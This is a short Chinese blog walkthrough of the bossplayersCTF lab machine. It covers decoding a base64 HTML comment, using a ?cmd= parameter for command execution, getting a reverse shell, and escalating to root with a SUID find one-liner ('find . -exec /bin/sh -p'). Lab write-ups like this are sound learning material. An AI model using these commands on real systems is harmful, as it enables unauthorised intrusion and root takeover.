渗透靶机bossplayersCTF

信息收集

确定靶机ip地址(前面就确定了,这里省略)和开放的服务

漏洞挖掘

可见开放了ssh和http,访问http看看,前端代码查看得到

<!--WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK-->

三次base64解密得到的:workinginprogress.php

访问看看

发现提示信息,可能存在命令执行,尝试?cmd=pwd

确实有命令执行

漏洞利用

直接反弹shell

提权

python模块得到标准格式:python -c 'import pty;pty.spawn("/bin/bash")'

查找suid权限的可执行文件

find / -perm -u=s -type f 2>/dev/null

发现find有这个权限,直接提权

find . -exec /bin/sh -p \; -quit

后渗透

然后到/root目录,发现robots.txt,将其内容base64解码,通关

注意

本文章内容仅限于交流学习,不可利用其中的方法进行非法行为,否则后果自负!!!

posted @ 2020-12-25 01:06  寒江寻影  阅读(57)  评论(0编辑  收藏  举报